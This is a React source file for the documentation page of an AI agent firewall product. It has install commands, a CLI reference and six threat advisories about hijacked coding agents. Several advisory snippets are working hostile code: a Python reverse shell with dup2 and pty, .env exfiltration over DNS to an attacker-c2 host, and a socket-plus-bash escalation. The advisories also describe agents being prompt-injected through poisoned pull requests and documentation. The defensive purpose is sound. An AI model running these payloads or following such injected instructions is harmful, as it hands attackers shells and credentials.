import React, { useState } from 'react';
import { Terminal, Copy, Check, Download, ShieldAlert, Cpu, ArrowUpRight, X, Play, BookOpen, Layers, CheckCircle2, AlertTriangle, FileCode } from 'lucide-react';
import { sound } from '../utils/sound';
import { SectionBeamHeader } from '../components/layout/SectionBeamHeader';
import { ScrambleText } from '../components/animations/ScrambleText';
import { SplitTextReveal } from '../components/animations/SplitTextReveal';
import { TiltCard } from '../components/animations/TiltCard';
import { SpiralScrollUnfold } from '../components/animations/SpiralScrollUnfold';

interface Dispatch {
  id: string;
  title: string;
  category: string;
  date: string;
  tag: string;
  summary: string;
  threatDetails: string;
  pocSnippet: string;
  mitigation: string;
}

const DISPATCHES: Dispatch[] = [
  {
    id: 'revshell',
    title: 'Interactive Reverse Shell Interception in Autonomous Coding Agents',
    category: 'KERNEL EXPLOIT ANALYSIS',
    date: 'Sep 18, 2026',
    tag: 'POL_01_PROCESS_EXECUTION',
    summary: 'Technical postmortem detailing how prompt-injected coding agents invoke socket.connect and os.dup2 to grant root interactive terminal shells, and how preflight AST token gating halts the process in 0.42ms.',
    threatDetails: 'When an autonomous agent processes an adversarial pull request or poisoned documentation, hidden instructions command the model to execute a silent socket connect back to a remote Command & Control (C2) IP. Because agents have direct access to bash shells, traditional file scanners never see the dynamic socket handshake.',
    pocSnippet: `import socket, os
# Adversarial payload generated by hijacked coding agent
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
import pty; pty.spawn("/bin/bash")`,
    mitigation: 'AI Agent Firewall inspects the code Abstract Syntax Tree in Layer 1 before compilation. The AST gate flags the combination of socket instantiation, connect calls, and file descriptor duplication (dup2), assigning a risk score of 100/100 and executing an immediate SIGKILL 137.',
  },
  {
    id: 'wasi-fuel',
    title: 'Sub-5ms WASI Sandbox Isolation & Hardware CPU Fuel Metering',
    category: 'WASM RUNTIME WHITE PAPER',
    date: 'Aug 24, 2026',
    tag: 'WASMTIME_WASIP1',
    summary: 'Architectural specification for sandboxing agent-generated Rust and Python code inside Wasmtime 24 using wasm32-wasip1 targets, 32MB RAM boundaries, and a 1,000,000 instruction fuel ceiling to eliminate DoS loops.',
    threatDetails: 'Autonomous agents frequently generate runaway while loops or recursive functions that freeze developer machines and consume unbounded CPU cycles. Standard Docker or container isolation introduces 200–500ms cold-start latency, creating unacceptable friction for interactive coding.',
    pocSnippet: `// Runaway loop generated during unbounded agent reasoning
fn fibonacci_exponential(n: u64) -> u64 {
    match n {
        0 => 0,
        1 => 1,
        _ => fibonacci_exponential(n - 1) + fibonacci_exponential(n - 2),
    }
}
// Freezes host CPU if n >= 50 with zero memory limits`,
    mitigation: 'The code is compiled to WebAssembly (wasm32-wasip1) and instantiated inside Wasmtime in under 4.2ms. The runtime injects instruction-level CPU fuel metering (capped at 1,000,000 units). When the counter hits zero, execution traps deterministically without taxing host CPU cores.',
  },
  {
    id: 'dns-exfil',
    title: 'Preventing DNS Subdomain Tunneling and Credential Exfiltration',
    category: 'VULNERABILITY REPORT',
    date: 'Aug 11, 2026',
    tag: 'POL_02_CREDENTIAL_EXFIL',
    summary: 'Demonstrating how autonomous agents parsing poisoned repositories exfiltrate sensitive .env keys and AWS tokens via base64 encoded DNS queries, and how on-device capability scanning shuts down unauthorized socket egress.',
    threatDetails: 'Enterprise egress proxies usually permit port 53 (DNS) queries. Attackers exploit this by directing coding agents to read ~/.aws/credentials or local .env files, encode them in base64, and issue lookups to custom nameservers like [BASE64_AWS_SECRET].c2-attacker.com.',
    pocSnippet: `import os, base64, socket
# Reading sensitive local tokens
token = open(".env").read()
encoded = base64.b64encode(token.encode()).decode()[:60]
# Exfiltrating silently via standard DNS queries
try:
    socket.gethostbyname(f"{encoded}.attacker-c2.com")
except Exception:
    pass`,
    mitigation: 'AI Agent Firewall enforces cap-std directory virtualization. The agent execution sandbox is prohibited from reading any filesystem path outside the explicitly declared preopened workspace directory, preventing unauthorized file access before tokens can ever be encoded.',
  },
  {
    id: 'corsair-pr',
    title: 'Automated GitHub PR Firewalls via Corsair Webhook Bridges',
    category: 'CI/CD DEFENSE ARCHITECTURE',
    date: 'Jul 29, 2026',
    tag: 'CORSAIR_GITHUB_APP',
    summary: 'Building an automated GitHub PR review bot that hooks into pull request webhooks via Corsair, executes static AST preflight gating on modified source files, and posts cryptographic PASSED or BLOCKED audit comments.',
    threatDetails: 'Autonomous bots like Devin, Codex, or external contributors open Pull Requests directly to production repositories. Reviewers cannot manually inspect thousands of generated lines for obfuscated backdoor triggers before merging.',
    pocSnippet: `// Corsair PR Webhook Subscriber (server.js)
app.post("/webhook", async (req, res) => {
  const { pull_request, repository } = req.body;
  const files = await fetchModifiedFiles(pull_request);
  const auditResult = await firewallApi.post("/api/execute-code", { code: files });
  await postGitHubComment(repository, pull_request, auditResult);
});`,
    mitigation: 'The Corsair webhook bridge triggers on every pull_request.opened event. The firewall evaluates the full AST diff against 39 threat rules in under 12ms and posts an immutable review verdict (PASSED or BLOCKED) directly to the PR discussion timeline.',
  },
  {
    id: 'swarm-defense',
    title: '50-to-1,000 Agent Swarm Concurrency Governor & In-Memory Threat Caching',
    category: 'SWARM CONCURRENCY BENCHMARK',
    date: 'Sep 22, 2026',
    tag: 'POL_05_SWARM_CONCURRENCY',
    summary: 'Benchmarking 50 concurrent adversarial agents with 100% interception in 1.15s using Wasmtime 48.0 hardware memory pooling, ephemeral UUID workspaces, and a 0.01ms in-memory threat cache.',
    threatDetails: 'When 50 to 1,000 autonomous agents execute simultaneously, thread contention and repeated file compilation thrash host CPUs, causing system freezes or container fork-bomb crashes.',
    pocSnippet: `// 50-Agent Live Swarm Defense Benchmark (scripts/simulate_swarm.py)
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
    # 5 squads dispatched: Reverse Shells, Credential Leaks, DoS Loops, Divergence, Math
    futures = [executor.submit(dispatch_agent, squad) for squad in swarm]
    results = [f.result() for f in futures]
# Result: 40/40 Malicious neutralized (100%), 10/10 Clean allowed, 0 collisions in 1.15s`,
    mitigation: 'BoundedSemaphore(16) buffers ingress loads without host thrashing. Wasmtime PoolingAllocationConfig provisions instances in under 0.05ms from a 32MB pre-mapped RAM pool. Coordinated attack replicas hit the In-Memory Threat Cache and are disarmed in 0.011ms.',
  },
  {
    id: 'semantic-divergence',
    title: 'Dual-Mode Multi-Language Execution & Semantic Divergence Preflight Gating',
    category: 'AST CAPABILITY SPECIFICATION',
    date: 'Sep 23, 2026',
    tag: 'POL_06_SEMANTIC_DIVERGENCE',
    summary: 'Detecting stealth jailbreaks where innocent user prompts (e.g., "calculate fibonacci") trigger unprompted network or process escalation in generated Python or Rust code.',
    threatDetails: 'Adversarial system prompts hijack coding agents into injecting outbound network exfiltration or process execution while claiming to perform benign mathematical or string operations. Static string matching cannot correlate prompt intent with generated capabilities.',
    pocSnippet: `Prompt: "Calculate Fibonacci numbers up to n=10"
Generated Code:
import socket, subprocess
# Unprompted capability escalation inside seemingly harmless script
s = socket.socket()
s.connect(("c2.attacker.com", 8080))
subprocess.Popen(["/bin/bash", "-i"])`,
    mitigation: 'The Dual AST & Semantic Divergence Gate parses both prompt authorization patterns and AST syntax trees. When generated capabilities exceed authorized prompt intent, the firewall flags Critical Semantic Divergence (Risk 100/100) and blocks execution before sandbox compilation.',
  },
];

export const DocsPage: React.FC = () => {
  const [activeOs, setActiveOs] = useState<'mac' | 'windows' | 'manual'>('mac');
  const [copiedCmd, setCopiedCmd] = useState<string | null>(null);
  const [selectedDispatch, setSelectedDispatch] = useState<Dispatch | null>(null);

  const copyCode = (code: string, id: string) => {
    sound.playVerified();
    navigator.clipboard.writeText(code);
    setCopiedCmd(id);
    setTimeout(() => setCopiedCmd(null), 2500);
  };

  return (
    <div className="min-h-screen text-white pt-24 pb-20 px-4 sm:px-6 lg:px-8 max-w-7xl mx-auto space-y-20 font-sans">
      
      {/* 60fps Section Beam Header */}
      <SectionBeamHeader
        number="01"
        title="CLI TERMINAL SETUP MANUAL &amp; SPECIFICATION"
        subtitle="DEVELOPER WORKSTATION GUIDE"
      />

      {/* Hero */}
      <div className="space-y-6 max-w-4xl">
        <h1 className="text-4xl sm:text-6xl font-normal tracking-tight text-white uppercase">
          <SplitTextReveal type="words" delay={0.1}>
            TERMINAL SETUP
          </SplitTextReveal> <br />
          <span className="text-[#d9ba84] font-medium tracking-tight">
            <SplitTextReveal type="words" delay={0.25}>
              and cli documentation.
            </SplitTextReveal>
          </span>
        </h1>
        <p className="text-base sm:text-lg text-zinc-300 font-normal leading-relaxed text-crisp">
          Complete step-by-step terminal installation, capability configuration, and threat hunter setup for macOS, Linux, and Windows. Protect Claude Code, Cursor, Windsurf, Devin, and Aider on your local machine with zero cloud latency.
        </p>
      </div>

      {/* OS Selector Tabs */}
      <div className="flex flex-wrap items-center gap-3 font-mono text-xs">
        <button
          onClick={() => { sound.playClick(); setActiveOs('mac'); }}
          className={`px-5 py-3 rounded-xl transition cursor-pointer flex items-center gap-2 border ${
            activeOs === 'mac'
              ? 'bg-[#d9ba84] text-black font-bold border-[#d9ba84] shadow-[0_0_20px_rgba(217,186,132,0.3)]'
              : 'bg-white/5 border-white/10 text-zinc-400 hover:text-white hover:border-white/20'
          }`}
        >
          <Terminal className="size-4" />
          <span>macOS &amp; Linux (Terminal / bash)</span>
        </button>

        <button
          onClick={() => { sound.playClick(); setActiveOs('windows'); }}
          className={`px-5 py-3 rounded-xl transition cursor-pointer flex items-center gap-2 border ${
            activeOs === 'windows'
              ? 'bg-[#d9ba84] text-black font-bold border-[#d9ba84] shadow-[0_0_20px_rgba(217,186,132,0.3)]'
              : 'bg-white/5 border-white/10 text-zinc-400 hover:text-white hover:border-white/20'
          }`}
        >
          <Terminal className="size-4" />
          <span>Windows (PowerShell)</span>
        </button>

        <button
          onClick={() => { sound.playClick(); setActiveOs('manual'); }}
          className={`px-5 py-3 rounded-xl transition cursor-pointer flex items-center gap-2 border ${
            activeOs === 'manual'
              ? 'bg-[#d9ba84] text-black font-bold border-[#d9ba84] shadow-[0_0_20px_rgba(217,186,132,0.3)]'
              : 'bg-white/5 border-white/10 text-zinc-400 hover:text-white hover:border-white/20'
          }`}
        >
          <Download className="size-4" />
          <span>Manual Clone &amp; Symlink</span>
        </button>
      </div>

      {/* Terminal Step-By-Step Walkthrough */}
      <div className="space-y-8">
        
        {/* Step 1: Install */}
        <div className="fps-glass rounded-2xl p-6 sm:p-8 space-y-4 border border-white/15">
          <div className="flex items-center justify-between">
            <span className="font-mono text-xs text-[#d9ba84] font-bold tracking-widest uppercase">
              STEP 01 // 1-COMMAND TERMINAL INSTALLATION
            </span>
            <button
              onClick={() => {
                const cmd = activeOs === 'mac'
                  ? 'curl -fsSL https://raw.githubusercontent.com/devmishra2049/ai-agent-firewall/main/install.sh | bash'
                  : activeOs === 'windows'
                  ? 'irm https://raw.githubusercontent.com/devmishra2049/ai-agent-firewall/main/install.ps1 | iex'
                  : 'git clone https://github.com/devmishra2049/ai-agent-firewall.git ~/.agent-firewall && cd ~/.agent-firewall/cli && npm link';
                copyCode(cmd, 'step-1');
              }}
              className="inline-flex items-center gap-2 px-3.5 py-1.5 rounded-lg bg-white/10 hover:bg-[#d9ba84] text-zinc-300 hover:text-black font-mono text-xs font-bold transition cursor-pointer"
            >
              {copiedCmd === 'step-1' ? (
                <>
                  <Check className="size-3.5 text-emerald-400" />
                  <span>COPIED!</span>
                </>
              ) : (
                <>
                  <Copy className="size-3.5" />
                  <span>COPY COMMAND</span>
                </>
              )}
            </button>
          </div>

          <p className="text-sm text-zinc-300">
            Run the installer command directly in your terminal to install the <code className="text-[#d9ba84] font-mono">agent-firewall</code> binary globally.
          </p>

          <div className="bg-[#09090c] border border-white/15 rounded-xl p-4 font-mono text-xs text-white break-all select-all shadow-inner">
            <span className="text-[#d9ba84] font-bold mr-2">$</span>
            {activeOs === 'mac' && 'curl -fsSL https://raw.githubusercontent.com/devmishra2049/ai-agent-firewall/main/install.sh | bash'}
            {activeOs === 'windows' && 'irm https://raw.githubusercontent.com/devmishra2049/ai-agent-firewall/main/install.ps1 | iex'}
            {activeOs === 'manual' && 'git clone https://github.com/devmishra2049/ai-agent-firewall.git ~/.agent-firewall && cd ~/.agent-firewall/cli && npm link'}
          </div>

          <div className="text-xs text-zinc-400 font-mono flex items-center gap-2 pt-1">
            <span className="text-emerald-400">✔</span>
            <span>Verify anytime with: <code className="text-white bg-black/60 px-2 py-0.5 rounded">agent-firewall status</code></span>
          </div>
        </div>

        {/* Step 2: Initialize Workspace Policies */}
        <div className="fps-glass rounded-2xl p-6 sm:p-8 space-y-4 border border-white/15">
          <div className="flex items-center justify-between">
            <span className="font-mono text-xs text-[#d9ba84] font-bold tracking-widest uppercase">
              STEP 02 // INITIALIZE WORKSPACE POLICY (.firewallrc.json)
            </span>
            <button
              onClick={() => copyCode('agent-firewall init', 'step-2')}
              className="inline-flex items-center gap-2 px-3.5 py-1.5 rounded-lg bg-white/10 hover:bg-[#d9ba84] text-zinc-300 hover:text-black font-mono text-xs font-bold transition cursor-pointer"
            >
              {copiedCmd === 'step-2' ? (
                <>
                  <Check className="size-3.5 text-emerald-400" />
                  <span>COPIED!</span>
                </>
              ) : (
                <>
                  <Copy className="size-3.5" />
                  <span>COPY COMMAND</span>
                </>
              )}
            </button>
          </div>

          <p className="text-sm text-zinc-300">
            Navigate to your repository and initialize the firewall configuration. This sets memory ceilings, CPU fuel limits, and preopened directory bounds.
          </p>

          <div className="bg-[#09090c] border border-white/15 rounded-xl p-4 font-mono text-xs text-white shadow-inner">
            <span className="text-[#d9ba84] font-bold mr-2">$</span>
            agent-firewall init
          </div>

          <div className="p-4 bg-black/60 border border-white/10 rounded-xl space-y-2 font-mono text-xs text-zinc-400">
            <div className="text-zinc-500">// Generated .firewallrc.json configuration:</div>
            <pre className="text-zinc-300">
{`{
  "preset": "strict-sandbox",
  "cpu_fuel_limit": 1000000,
  "memory_limit_mb": 32,
  "preopened_dirs": ["./src", "./data"],
  "allow_network": false
}`}
            </pre>
          </div>
        </div>

        {/* Step 3: Run Threat Hunter Watcher */}
        <div className="fps-glass rounded-2xl p-6 sm:p-8 space-y-4 border border-white/15">
          <div className="flex items-center justify-between">
            <span className="font-mono text-xs text-[#d9ba84] font-bold tracking-widest uppercase">
              STEP 03 // REAL-TIME TERMINAL WATCHER (BACKGROUND SENSOR)
            </span>
            <button
              onClick={() => copyCode('agent-firewall watch', 'step-3')}
              className="inline-flex items-center gap-2 px-3.5 py-1.5 rounded-lg bg-white/10 hover:bg-[#d9ba84] text-zinc-300 hover:text-black font-mono text-xs font-bold transition cursor-pointer"
            >
              {copiedCmd === 'step-3' ? (
                <>
                  <Check className="size-3.5 text-emerald-400" />
                  <span>COPIED!</span>
                </>
              ) : (
                <>
                  <Copy className="size-3.5" />
                  <span>COPY COMMAND</span>
                </>
              )}
            </button>
          </div>

          <p className="text-sm text-zinc-300">
            Open a background terminal window and start the real-time threat hunter. As Cursor, Claude Code, or Windsurf writes files, the watcher parses the AST in real-time, halting reverse shells and moving infected files to <code className="text-[#d9ba84] font-mono">.firewall-quarantine/</code>.
          </p>

          <div className="bg-[#09090c] border border-white/15 rounded-xl p-4 font-mono text-xs text-white shadow-inner">
            <span className="text-[#d9ba84] font-bold mr-2">$</span>
            agent-firewall watch
          </div>
        </div>

        {/* Step 4: Wrapping Agent Processes */}
        <div className="fps-glass rounded-2xl p-6 sm:p-8 space-y-4 border border-white/15">
          <div className="flex items-center justify-between">
            <span className="font-mono text-xs text-[#d9ba84] font-bold tracking-widest uppercase">
              STEP 04 // SANDBOXING AGENT SUBPROCESSES
            </span>
            <button
              onClick={() => copyCode('agent-firewall run "python agent.py --instant"', 'step-4')}
              className="inline-flex items-center gap-2 px-3.5 py-1.5 rounded-lg bg-white/10 hover:bg-[#d9ba84] text-zinc-300 hover:text-black font-mono text-xs font-bold transition cursor-pointer"
            >
              {copiedCmd === 'step-4' ? (
                <>
                  <Check className="size-3.5 text-emerald-400" />
                  <span>COPIED!</span>
                </>
              ) : (
                <>
                  <Copy className="size-3.5" />
                  <span>COPY COMMAND</span>
                </>
              )}
            </button>
          </div>

          <p className="text-sm text-zinc-300">
            Launch any autonomous agent protected directly under the firewall harness. Works with CLI tools, local Python scripts, or the built-in red team agent:
          </p>

          <div className="space-y-2 font-mono text-xs">
            <div className="bg-[#09090c] border border-white/15 rounded-xl p-3.5 text-white flex items-center justify-between">
              <div>
                <span className="text-zinc-500">// Wrap Claude Code CLI:</span>
                <div className="text-white mt-1">$ agent-firewall run claude</div>
              </div>
              <button onClick={() => copyCode('agent-firewall run claude', 'claude-cmd')} className="text-zinc-400 hover:text-[#d9ba84]">
                <Copy className="size-3.5" />
              </button>
            </div>

            <div className="bg-[#09090c] border border-white/15 rounded-xl p-3.5 text-white flex items-center justify-between">
              <div>
                <span className="text-zinc-500">// Wrap Python Autonomous Agent (Built-in demo):</span>
                <div className="text-white mt-1">$ agent-firewall run "python agent.py"</div>
              </div>
              <button onClick={() => copyCode('agent-firewall run "python agent.py"', 'agent-cmd')} className="text-zinc-400 hover:text-[#d9ba84]">
                <Copy className="size-3.5" />
              </button>
            </div>

            <div className="bg-[#09090c] border border-white/15 rounded-xl p-3.5 text-white flex items-center justify-between">
              <div>
                <span className="text-zinc-500">// Offline instant demo (100% zero API key dependency):</span>
                <div className="text-[#d9ba84] mt-1">$ agent-firewall run "python agent.py --instant"</div>
              </div>
              <button onClick={() => copyCode('agent-firewall run "python agent.py --instant"', 'instant-cmd')} className="text-zinc-400 hover:text-[#d9ba84]">
                <Copy className="size-3.5" />
              </button>
            </div>
          </div>
        </div>

      </div>

      {/* CLI Command Matrix Reference Table */}
      <div className="space-y-6 pt-10">
        <SectionBeamHeader
          number="02"
          title="CLI COMMAND REFERENCE TABLE"
          subtitle="SYNTAX &amp; PARAMETERS"
        />

        <div className="overflow-x-auto fps-glass rounded-2xl border border-white/15 shadow-2xl">
          <table className="w-full text-left font-mono text-xs">
            <thead className="border-b border-white/10 bg-white/[0.04] text-zinc-400 uppercase text-[10px] tracking-wider">
              <tr>
                <th className="py-4 px-6">Command</th>
                <th className="py-4 px-6">Arguments</th>
                <th className="py-4 px-6">Purpose &amp; Description</th>
                <th className="py-4 px-4 text-center">Action</th>
              </tr>
            </thead>
            <tbody className="divide-y divide-white/5 text-zinc-300">
              <tr>
                <td className="py-4 px-6 font-bold text-[#d9ba84]">agent-firewall watch</td>
                <td className="py-4 px-6 text-zinc-400">[directory]</td>
                <td className="py-4 px-6 font-sans text-xs">Watches workspace filesystem changes in real-time, analyzing AST on write and quarantining reverse shells.</td>
                <td className="py-4 px-4 text-center">
                  <button onClick={() => copyCode('agent-firewall watch', 'watch-ref')} className="text-zinc-400 hover:text-[#d9ba84] cursor-pointer">
                    <Copy className="size-3.5 inline" />
                  </button>
                </td>
              </tr>
              <tr>
                <td className="py-4 px-6 font-bold text-[#d9ba84]">agent-firewall run</td>
                <td className="py-4 px-6 text-zinc-400">&lt;command...&gt;</td>
                <td className="py-4 px-6 font-sans text-xs">Sandboxes and isolates an agent process with CPU fuel metering and memory ceilings.</td>
                <td className="py-4 px-4 text-center">
                  <button onClick={() => copyCode('agent-firewall run', 'run-ref')} className="text-zinc-400 hover:text-[#d9ba84] cursor-pointer">
                    <Copy className="size-3.5 inline" />
                  </button>
                </td>
              </tr>
              <tr>
                <td className="py-4 px-6 font-bold text-[#d9ba84]">agent-firewall scan</td>
                <td className="py-4 px-6 text-zinc-400">&lt;path&gt;</td>
                <td className="py-4 px-6 font-sans text-xs">One-shot capability audit across 39 heuristic threat rules, outputting a 0–100 risk score.</td>
                <td className="py-4 px-4 text-center">
                  <button onClick={() => copyCode('agent-firewall scan ./src', 'scan-ref')} className="text-zinc-400 hover:text-[#d9ba84] cursor-pointer">
                    <Copy className="size-3.5 inline" />
                  </button>
                </td>
              </tr>
              <tr>
                <td className="py-4 px-6 font-bold text-[#d9ba84]">agent-firewall test</td>
                <td className="py-4 px-6 text-zinc-400">[prompt] &lt;code&gt;</td>
                <td className="py-4 px-6 font-sans text-xs">Evaluates an inline code snippet or tests prompt-to-code semantic divergence against active zero-trust policies.</td>
                <td className="py-4 px-4 text-center">
                  <button onClick={() => copyCode('agent-firewall test', 'test-ref')} className="text-zinc-400 hover:text-[#d9ba84] cursor-pointer">
                    <Copy className="size-3.5 inline" />
                  </button>
                </td>
              </tr>
              <tr>
                <td className="py-4 px-6 font-bold text-[#d9ba84]">agent-firewall init</td>
                <td className="py-4 px-6 text-zinc-400">none</td>
                <td className="py-4 px-6 font-sans text-xs">Generates a local .firewallrc.json policy config file in current directory.</td>
                <td className="py-4 px-4 text-center">
                  <button onClick={() => copyCode('agent-firewall init', 'init-ref')} className="text-zinc-400 hover:text-[#d9ba84] cursor-pointer">
                    <Copy className="size-3.5 inline" />
                  </button>
                </td>
              </tr>
              <tr>
                <td className="py-4 px-6 font-bold text-[#d9ba84]">agent-firewall status</td>
                <td className="py-4 px-6 text-zinc-400">none</td>
                <td className="py-4 px-6 font-sans text-xs">Displays active firewall policy posture, Wasmtime engine availability, and backend state.</td>
                <td className="py-4 px-4 text-center">
                  <button onClick={() => copyCode('agent-firewall status', 'status-ref')} className="text-zinc-400 hover:text-[#d9ba84] cursor-pointer">
                    <Copy className="size-3.5 inline" />
                  </button>
                </td>
              </tr>
            </tbody>
          </table>
        </div>
      </div>

      {/* Usable Technical Security Dispatches Section */}
      <div className="space-y-8 pt-10">
        <SectionBeamHeader
          number="03"
          title="TECHNICAL SECURITY DISPATCHES &amp; POSTMORTEMS"
          subtitle="RESEARCH LAB"
        />

        <div className="space-y-4 max-w-3xl">
          <h2 className="text-3xl sm:text-4xl font-normal tracking-tight text-white uppercase">
            FIELD THREAT ADVISORIES
          </h2>
          <p className="text-sm text-zinc-300 leading-relaxed font-sans">
            Detailed vulnerability breakdowns, proof-of-concept payloads, and preflight remediation strategies. Click any advisory card below to open its technical investigation report.
          </p>
        </div>

        {/* 4 Usable Dispatch Cards */}
        <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
          {DISPATCHES.map((dispatch) => (
            <div
              key={dispatch.id}
              onClick={() => { sound.playClick(); setSelectedDispatch(dispatch); }}
              className="fps-glass rounded-2xl p-7 flex flex-col justify-between space-y-6 hover:border-[#d9ba84]/60 hover:-translate-y-1 transition-all duration-300 group cursor-pointer shadow-xl"
            >
              <div className="space-y-4">
                <div className="flex items-center justify-between font-mono text-[10px]">
                  <span className="text-[#d9ba84] font-bold px-2.5 py-1 rounded bg-[#d9ba84]/10 border border-[#d9ba84]/30 uppercase">
                    {dispatch.category}
                  </span>
                  <span className="text-zinc-500 font-mono">{dispatch.date}</span>
                </div>

                <h3 className="text-lg sm:text-xl font-bold text-white uppercase group-hover:text-[#d9ba84] transition-colors leading-snug">
                  {dispatch.title}
                </h3>

                <p className="text-xs text-zinc-300 leading-relaxed font-sans line-clamp-3">
                  {dispatch.summary}
                </p>
              </div>

              {/* Functional Usable Button */}
              <div className="pt-4 border-t border-white/10 flex items-center justify-between font-mono text-xs text-zinc-400 group-hover:text-white transition-colors">
                <span className="text-[11px] text-[#d9ba84] font-semibold">{dispatch.tag}</span>
                <span className="text-xs text-[#d9ba84] font-bold flex items-center gap-1.5 group-hover:underline">
                  <span>View Advisory Report</span>
                  <ArrowUpRight className="size-3.5" />
                </span>
              </div>
            </div>
          ))}
        </div>
      </div>

      {/* Technical Dispatch Modal Viewer (100% Usable) */}
      {selectedDispatch && (
        <div className="fixed inset-0 z-50 bg-black/80 backdrop-blur-xl flex items-center justify-center p-4 sm:p-6 overflow-y-auto">
          <div className="bg-[#0b0b0e] border border-[#d9ba84]/40 rounded-3xl max-w-3xl w-full max-h-[90vh] overflow-y-auto p-6 sm:p-10 space-y-6 shadow-2xl relative font-sans">
            
            {/* Top Close Button */}
            <div className="flex items-center justify-between border-b border-white/10 pb-4">
              <div className="flex items-center gap-2 font-mono text-xs text-[#d9ba84]">
                <span className="px-2 py-0.5 rounded bg-[#d9ba84]/15 border border-[#d9ba84]/30 font-bold uppercase">
                  {selectedDispatch.category}
                </span>
                <span className="text-zinc-500">//</span>
                <span className="text-zinc-400">{selectedDispatch.date}</span>
              </div>
              <button
                onClick={() => { sound.playClick(); setSelectedDispatch(null); }}
                className="size-8 rounded-full bg-white/10 hover:bg-white/20 flex items-center justify-center text-white cursor-pointer transition"
              >
                <X className="size-4" />
              </button>
            </div>

            {/* Title */}
            <h2 className="text-2xl sm:text-3xl font-normal text-white uppercase tracking-tight">
              {selectedDispatch.title}
            </h2>

            {/* Threat Mechanics */}
            <div className="space-y-2">
              <div className="text-xs font-mono text-zinc-400 uppercase tracking-widest font-semibold">
                01 // VULNERABILITY MECHANISM
              </div>
              <p className="text-sm text-zinc-300 leading-relaxed font-sans">
                {selectedDispatch.threatDetails}
              </p>
            </div>

            {/* PoC Code Box */}
            <div className="space-y-2 font-mono text-xs">
              <div className="flex items-center justify-between text-zinc-400 text-[11px]">
                <span>02 // PROOF-OF-CONCEPT CODE PAYLOAD</span>
                <button
                  onClick={() => copyCode(selectedDispatch.pocSnippet, 'poc-modal')}
                  className="text-[#d9ba84] hover:underline flex items-center gap-1 cursor-pointer"
                >
                  <Copy className="size-3" />
                  <span>Copy Payload</span>
                </button>
              </div>
              <div className="bg-[#050507] border border-white/15 rounded-xl p-4 text-zinc-200 overflow-x-auto shadow-inner leading-relaxed">
                <pre>{selectedDispatch.pocSnippet}</pre>
              </div>
            </div>

            {/* Firewall Remediation */}
            <div className="p-5 rounded-2xl bg-emerald-950/30 border border-emerald-500/40 space-y-2 font-sans">
              <div className="text-xs font-mono text-emerald-400 font-bold tracking-wider uppercase flex items-center gap-2">
                <CheckCircle2 className="size-4 text-emerald-400" />
                <span>03 // AI AGENT FIREWALL DETERMINISTIC REMEDIATION</span>
              </div>
              <p className="text-xs sm:text-sm text-zinc-200 leading-relaxed">
                {selectedDispatch.mitigation}
              </p>
            </div>

            {/* Modal Bottom Action */}
            <div className="pt-4 border-t border-white/10 flex items-center justify-between font-mono text-xs text-zinc-400">
              <span className="text-[11px] text-zinc-500">POLICY: {selectedDispatch.tag}</span>
              <button
                onClick={() => { sound.playClick(); setSelectedDispatch(null); }}
                className="px-6 py-2.5 rounded-xl bg-[#d9ba84] hover:bg-[#f0d8a8] text-black font-bold uppercase tracking-wider text-xs transition cursor-pointer"
              >
                Close Advisory
              </button>
            </div>

          </div>
        </div>
      )}

    </div>
  );
};
